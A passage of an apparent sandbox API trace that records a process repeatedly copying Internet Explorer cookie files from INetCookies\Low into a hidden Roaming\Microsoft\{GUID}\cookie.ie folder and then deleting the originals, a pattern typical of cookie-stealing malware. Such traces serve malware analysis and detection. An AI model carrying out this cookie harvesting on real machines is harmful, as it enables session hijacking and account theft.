lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.022] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.022] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.022] StrChrW (lpStart="Low\\TCXQPY9L.txt", wMatch=0x74c005c) returned="\\TCXQPY9L.txt" [0253.022] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.022] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.022] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.022] StrChrW (lpStart="TCXQPY9L.txt", wMatch=0x74c005c) returned 0x0 [0253.022] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="TCXQPY9L.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\TCXQPY9L.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\TCXQPY9L.txt" [0253.022] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TCXQPY9L.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\tcxqpy9l.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\TCXQPY9L.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\tcxqpy9l.txt"), bFailIfExists=0) returned 1 [0253.027] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TCXQPY9L.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\tcxqpy9l.txt")) returned 1 [0253.028] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.028] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.028] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.028] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.028] StrChrW (lpStart="Low\\TEW946CI.txt", wMatch=0x74c005c) returned="\\TEW946CI.txt" [0253.028] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.028] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.028] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.028] StrChrW (lpStart="TEW946CI.txt", wMatch=0x74c005c) returned 0x0 [0253.028] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="TEW946CI.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\TEW946CI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\TEW946CI.txt" [0253.028] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TEW946CI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\tew946ci.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\TEW946CI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\tew946ci.txt"), bFailIfExists=0) returned 1 [0253.033] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TEW946CI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\tew946ci.txt")) returned 1 [0253.034] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.034] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.034] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.034] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.034] StrChrW (lpStart="Low\\TFCJHLEI.txt", wMatch=0x74c005c) returned="\\TFCJHLEI.txt" [0253.034] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.034] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.034] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.034] StrChrW (lpStart="TFCJHLEI.txt", wMatch=0x74c005c) returned 0x0 [0253.034] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="TFCJHLEI.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\TFCJHLEI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\TFCJHLEI.txt" [0253.035] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TFCJHLEI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\tfcjhlei.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\TFCJHLEI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\tfcjhlei.txt"), bFailIfExists=0) returned 1 [0253.039] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TFCJHLEI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\tfcjhlei.txt")) returned 1 [0253.041] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.041] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.041] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.041] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.041] StrChrW (lpStart="Low\\U2OYIS47.txt", wMatch=0x74c005c) returned="\\U2OYIS47.txt" [0253.041] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.041] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.041] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.041] StrChrW (lpStart="U2OYIS47.txt", wMatch=0x74c005c) returned 0x0 [0253.041] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="U2OYIS47.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\U2OYIS47.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\U2OYIS47.txt" [0253.041] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\U2OYIS47.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\u2oyis47.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\U2OYIS47.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\u2oyis47.txt"), bFailIfExists=0) returned 1 [0253.050] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\U2OYIS47.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\u2oyis47.txt")) returned 1 [0253.053] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.053] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.053] StrChrW (lpStart="Low\\U8FCPAKJ.txt", wMatch=0x74c005c) returned="\\U8FCPAKJ.txt" [0253.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.053] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.053] StrChrW (lpStart="U8FCPAKJ.txt", wMatch=0x74c005c) returned 0x0 [0253.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="U8FCPAKJ.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\U8FCPAKJ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\U8FCPAKJ.txt" [0253.054] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\U8FCPAKJ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\u8fcpakj.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\U8FCPAKJ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\u8fcpakj.txt"), bFailIfExists=0) returned 1 [0253.059] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\U8FCPAKJ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\u8fcpakj.txt")) returned 1 [0253.060] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.060] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.060] StrChrW (lpStart="Low\\UBUPNOZC.txt", wMatch=0x74c005c) returned="\\UBUPNOZC.txt" [0253.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.061] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.061] lstrcatW (in: 